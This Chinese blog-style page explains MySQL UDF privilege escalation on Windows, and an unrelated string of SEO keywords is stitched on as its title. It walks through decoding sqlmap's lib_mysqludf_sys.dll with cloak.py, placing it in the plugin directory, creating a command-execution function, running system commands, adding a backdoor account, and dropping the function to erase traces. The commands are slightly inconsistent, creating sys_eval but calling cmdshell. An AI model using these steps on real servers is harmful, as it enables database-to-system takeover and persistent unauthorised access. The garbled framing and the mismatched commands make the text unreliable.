违规网站开发 开发者如何规避风险,网店运营流程步骤,修改wordpress登录页logo,郑州公司建站模板01前言udf ‘user defined function‘#xff0c;即‘用户自定义函数’。文件后缀为‘.dll’#xff0c;常用c语言编写。通过在udf文件中定义新函数#xff0c;对MYSQL的功能进行扩充#xff0c;可以执行系统任意命令。将MYSQL账号root转化为系统system权限。02思路1.将ud… 01前言udf ‘user defined function‘即‘用户自定义函数’。文件后缀为‘.dll’常用c语言编写。通过在udf文件中定义新函数对MYSQL的功能进行扩充可以执行系统任意命令。将MYSQL账号root转化为系统system权限。02思路1.将udf文件上传到指定位置sqlmap中有现成的udf文件有linux版本和windows版本分为32位和64位一定要选择对应系统的对应版本版本否则会显示Can‘t open shared library ‘udf.dll‘。尤其要注意 sqlmap\udf\mysql\windows\32目录下存放着lib_mysqludf_sys.dll_ sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll_但是sqlmap 中 自带 的shell 以及一些二进制文件为了防止被误杀都经过异或方式编码不能直接使用的。可以利用sqlmap 自带的解码工具cloak.py进入到 sqlmap\extra\cloak\cloak 目录下执行命令python ./cloak.py -d -i sqlmap\data\udf\mysql\windows\32\lib_mysqludf_sys.dll_ -o lib_mysqludf_sys.dll会在当前目录下生成一个解锁后的lib_mysqludf_sys.dll通过以下命令查看mysql的运行环境show variables like %version%;show variables like %compile%;或者select version_compile_machine;可以判断是在64为的cpu上运行了win32的系统因此我们的mysql程序也是32位的。在使用udf.dll文件时应该使用windows系统下32位的文件sqlmap中的udf文件提供的函数sys_eval执行任意命令并将输出返回。sys_exec执行任意命令并将退出码返回。sys_get获取一个环境变量。sys_set创建或修改一个环境变量。有了udf文件接下来就是利用各种办法上传到网站指定目录下 MySQL5.0导出路径随意5.0 MySQL5.1则需要导出至目标服务器的系统目录(如c:/windows/system32/)MySQL 5.1以上版本必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。通过以下命令查看mysql版本select version;select version();根据不同的版本号将udf.dll文件上传到对应的目录下。本人所测试的mysql版本是5.5.53因此需要将udf.dll文件上传到mysal/lib/plugin目录下可以通过以下命令查看plugin文件夹的绝对路径select plugin_dir;本次只讨论udf提权上传过程忽略create function sys_eval returns string soname udf.dll;select cmdshell (whoami);select cmdshell (net user aaa abc123!# /add);消除痕迹drop function sys_eval;扫码关注微信号JIANJIEXX_
